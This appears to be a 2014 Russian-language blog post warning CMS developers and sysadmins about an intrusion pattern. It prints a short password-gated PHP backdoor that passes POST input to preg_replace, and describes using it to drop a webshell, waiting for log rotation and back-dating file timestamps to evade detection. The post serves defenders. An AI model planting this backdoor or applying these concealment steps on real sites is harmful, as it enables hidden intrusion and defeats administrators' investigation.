Коротко о безопасности веб-приложений...

2014-Jan-08, Wednesday 15:15
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (фига)
[personal profile] qkowlew
Данный пост может быть полезен разработчикам CMS и сисадминам. см. также пост в ХабраХабр
  1. Через дыру (скорее всего, в коде сайта) создать на сайте скрипт Vystavka_anons.php типа 
    ?php
if (md5($_POST['p']) == 'b2bf02228dbfbb1cb1e7f853109710fe') {
    preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
  2. Дождаться, когда соответствующий моменту 1 логи вебсервера в результате ротации сотрутся. Дабы затруднить поиск собственно эксплуатируемой уязвимости.
  3. Воспользоваться созданным скриптом чтобы создать вебшелл - например Sokolniki20100223_117.php
  4. Воспользоваться вебшеллом. Прежде всего для того, чтобы изменить TimeStamp первого залитого файла Vystavka_anons.php на прошлую дабы затруднить поиск новых файлов по modification time.
Tags:
  • Add Memory
  • Share This Entry
This account has disabled anonymous posting.
(will be screened if not validated)
If you don't have an account you can create one now.
HTML doesn't work in the subject.
More info about formatting

If you are unable to use this captcha for any reason, please contact us by email at support@dreamwidth.org

 
Notice: This account is set to log the IP addresses of everyone who comments.
Links will be displayed as unclickable URLs to help prevent spam.